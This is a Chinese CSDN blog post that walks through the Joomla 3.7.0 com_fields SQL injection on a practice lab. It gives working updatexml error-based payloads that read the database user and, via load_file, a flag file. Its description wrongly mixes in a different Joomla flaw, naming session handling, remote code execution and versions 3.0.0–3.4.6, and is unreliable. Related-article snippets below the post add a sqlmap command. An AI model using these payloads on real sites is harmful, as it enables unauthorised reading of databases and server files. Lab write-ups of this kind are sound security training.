Joomla 3.7.0 SQL注入漏洞

最新推荐文章于 2024-05-17 09:28:04 发布
最新推荐文章于 2024-05-17 09:28:04 发布
阅读量2k 收藏 2
点赞数 2
分类专栏: CMS 文章标签: 安全 web安全 joomla
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_48985780/article/details/121654759
版权

 Joomla 3.7.0 SQL注入漏洞

漏洞描述:

漏洞本质是Joomla对session数据处理不当,未经授权的攻击者可以发送精心构造的恶意 HTTP 请求,获取服务器权限,实现远程命令执行。

影响范围:

Joomla 3.0.0-3.4.6

环境搭建:

这里采用安鸾渗透实战  地址

漏洞复现:

打开之后页面

安装完成后,构造payload

/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,user()),1)

 看到返回了用户 

构造读取文件的payload

0x2f666c6167/flag得hex编码

/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,load_file(0x2f666c6167)),1)

 得到flag

漏洞修复:

升级最新版完整安装包以及升级补丁包

下载地址

xzhome
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CVE-2018-6376复现-Joomla!3.8.4-SQL注入漏洞
qq_42322144的博客
09-16 834
1.1漏洞原因 1.1.1漏洞描述 图9 CVE-2018-6376 漏洞被描述为:在Joomla!在3.8.4之前,SQL语句中缺少类型转换导致Hathor postinstall消息中的SQL注入漏洞。 为了预防SQL注入攻击,而将输入到应用程序中的某些数据进行了“转义(escape)”,但是这些数据却又在“未被转义(Unescaped)”的查询窗体中重复使用。此时,攻击者可能注入的是一个PAYLOAD,这样就会构成一个SQL查询语句并被执行; 当用户可控数据以不安全的方式合并到数据库SQL查询中时,
CVE-2015-7857 Joomla注入漏洞利用工具
04-18
CVE-2015-7857 Joomla注入漏洞利用工具,有需要自行下载
Joomla 3.4.3版本 SQL注入漏洞分析
weixin_34270865的博客
12-24 476
0x00 漏洞分析 漏洞触发的代码位于:/administrator/components/com_contenthistory/models/history.php,getListQuery()函数内: 通过SQL及报错信息,可以知道我们的注入payload被插入到了红色框部分内。跟进getState()函数,位于libraries/legacy/m...
Joomla 3.7.0 (CVE-2017-8917) SQL注入漏洞环境
最新发布
weixin_45653478的博客
05-17 429
Joomla是一个基于PHP的内容管理系统(CMS),广泛应用于各类网站。2017年,Joomla 3.7.0版本被发现存在SQL注入漏洞(CVE-2017-8917),攻击者可以利用该漏洞对数据库进行未授权查询或操作,可能导致数据泄露、篡改甚至删除。
Joomla 3.7.0 (CVE-2017-8917) SQL注入漏洞
huayimy的博客
12-30 1052
Joomla 3.7.0 (CVE-2017-8917) SQL注入漏洞,com_fields组件,启动docker,安装mysql数据库
Joomla内核SQL注入漏洞(CVE-2018-8045)
huayimy的博客
12-30 563
Joomla内核SQL注入漏洞(CVE-2018-8045),登录账号密码后会显示报错
CMS Joomla SQL 注入漏洞(CVE-2017-8917 )
CuiXY's Blog
01-18 819
0x01 原理 1.Joomla是内容管理的网站程序,也就是CMS。漏洞原理是com_fields组件,对请求数据过滤不严谨,从而导致sql注入。这个就是有问题的代码,可以看出sql根本没有过滤,通过对list中的fullordering这个字段的精心构造,就可以完成sql攻击 2.追根溯源,网站程序Joomla的com_fields启动时,会调用display这个方法 3.display这个...
安鸾CMS系列之Joomla
柠鹿的轨迹
02-22 479
声明:文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担! 本文首发于涂寐’s Blogs:https://0xtlu.github.io/article/51e9a7e.html 题目URL:http://106.15.50.112:8039/ 提示:flag在服务器系统根目录,文件名为flag ①PHP:5.6.40 ②nginx/1.14.2 ③Joomla! 3.7 ④Linux
Joomla3.7.0 (CVE-2017-8917) SQL注入漏洞复现
weixin_42786460的博客
09-01 1197
Joomla3.7.0 (CVE-2017-8917) SQL注入漏洞复现
joomla漏洞利用代码
12-29
joomla漏洞利用代码,影响版本joomla1.5-3.4.最开始检测到利用该漏洞实施入侵的是 Securi 安全团队
Joomla_3.7.0-Stable-Full_Package.zip
04-29
代码审计cms安装包,用于交流学习,关联cve-2017-8917文章,请自行下载。
web应用漏洞.docx
07-05
二、SQL 注入漏洞 1. BEESCMS admin/login.php SQL 注入漏洞:攻击者可以通过该漏洞执行任意 SQL 语句。 2. DedeCMS /member/buy_action.php SQL 注入漏洞:攻击者可以通过该漏洞执行任意 SQL 语句。 3. DedeCMS ...
Java反序列化漏洞利用工具(joomla
01-01
Java反序列化漏洞利用工具(joomla版本)亲测可用,直接GETSHELL以及执行命令没问题
Joomla-3.7.0
cgjil的博客
09-09 152
这个漏洞影响所有使用joomla 3.7版本及以下内容管理系统的网站,攻击者可以使用利用这个漏洞获取数据库的内容,包括用户数据和session数据。得到这些数据后,攻击者可以利用session登录网站后台,查看敏感信息,还可以修改原密码。这个漏洞影响所有使用joomla 3.7版本及以下内容管理系统的网站,攻击者可以使用利用这个漏洞获取数据库的内容,包括用户数据和session数据。3.7.0搭建][https://vulapps.evalbug.com/j_joomla_2/]根据以下链接进行搭建。
Joomla SQL注入
m0_67612076的博客
04-07 537
首先: 登录“110.40.154.100:8080”。然后在其后输入 :“index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml”进入这个界面 然后进入sqlmap进入注入: 第一步:sqlmap.py -u"http://110.40.154.100:8080/index.php?option=com_fields&view=fields&layo
Joomla 漏洞总结
星落的博客
04-17 8290
CVE-2015-8562 反序列化漏洞 影响版本 Joomla 3.4.5 CVE-2017-8917 SQL注入漏洞 影响版本 Joomla 3.7.0
Joomla! v3.7 SQL注入高危漏洞技术分析(CVE-2017-8917)
weixin_33882452的博客
09-19 734
本文讲的是Joomla! v3.7 SQL注入高危漏洞技术分析(CVE-2017-8917),近日,全球知名内容管理系统Joomla!爆出高危安全漏洞,任何能访问网站的用户都可以发起攻击,窃取用户会话和账号密码。 安全风险:严重 漏洞类型:SQL注入 影响版本:3.7 修复版本:3.7.1 CVE编号:CVE-2017-8917 漏洞描述 com_...
梦想CMS注入漏洞分析&发现小彩蛋
weixin_42508548的博客
11-24 2646
查资料的时候,偶然间看到这样一个漏洞,在一个提交表单的地方,插入SQL语句,便可以进行报错注入。看着有点像二次注入,对于这样类型的注入,我个人遇到的还是比较少的,再加上一般这种地方多数会尝试XSS,所以进行了分析,看看漏洞到底是如何产生的。 0x02 环境搭建 1、首先准备phpstudy,这里使用的是2016版本的,php版本为5.6.27 2、下载cms源码 cms下载地址:http://www.lmxcms.com/file/d/down/xitong/20210
joomla3.7.0漏洞
05-16
Joomla 3.7.0 版本存在一个漏洞,该漏洞可能允许攻击者在未经授权的情况下上传任意文件,包括恶意文件。该漏洞是由于在文件上传时未正确验证文件扩展名所致。攻击者可以通过上传一个带有.php扩展名的文件,然后通过访问该文件来执行任意代码。 Joomla 官方已经发布了修复该漏洞的版本。如果您正在运行 Joomla 3.7.0 或更早版本,请立即升级到最新版本以保护您的网站安全。同时,建议您使用安全的密码策略、定期备份您的网站和监控网站的日志以及流量,以及安装防火墙和其他安全插件来增强您的网站安全性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值